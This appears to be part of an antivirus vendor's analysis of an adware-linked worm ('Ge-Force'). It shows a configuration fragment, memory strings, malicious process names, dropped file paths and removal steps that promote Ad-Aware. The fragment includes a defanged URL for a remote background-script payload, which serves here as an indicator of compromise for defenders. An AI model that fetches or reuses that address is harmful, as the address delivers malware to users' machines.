      <NewTabEmbed>NA</NewTabEmbed>
      <OpenSearchURL>NA</OpenSearchURL>
      <BackgroundJS>hXXp://js.newstatsdemosrv.com/plugin/apps/69129/bg/na/ie/bg_code.js</BackgroundJS>
      <BackgroundVer>1</BackgroundVer>
      <Manifest>NA</Manifest>
      <ChangePrevious>false

    <<< skipped >>>

    The Worm connects to the servers at the following location(s):

    Explorer.EXE_2032_rwx_00E70000_00002000:

    SHELL32.DLL
    ShellExecuteA
    KERNEL32.DLL
    .rsrc
    .text

    Explorer.EXE_2032_rwx_00E80000_00001000:

    |explorer.exeM_2032_


    Remove it with Ad-Aware

    1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. Update the definition files.
    3. Run a full scan of your computer.


    Manual removal*

    1. Terminate malicious process(es) (How to End a Process With the Task Manager):

      Ge-Force-codedownloader.exe:2504
      Ge-Force-codedownloader.exe:2564
      regsvr32.exe:2416
      Khtmovq.exe:664
      %original file name%.exe:1616
      mscorsvw.exe:172
      Ge-Force-bg.exe:2632

    2. Delete the original Worm file.
    3. Delete or disinfect the following files created/modified by the Worm:

      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\manifest[1].xml (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\192.js (869 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\184[1].js (25 bytes)
      %Program Files%\Ge-Force\utils.exe (86583 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\ExecDos.dll (5 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\301.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\7.js (685 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\1.js (10 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\3.js (63 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\background.js (429 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\281.js (485 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\UserInfo.dll (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\91.js (6584 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\93.js (953 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\104.js (921 bytes)

    4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
    6. Reboot the computer.

    *Manual removal may cause unexpected system behaviour and should be performed at your own risk.
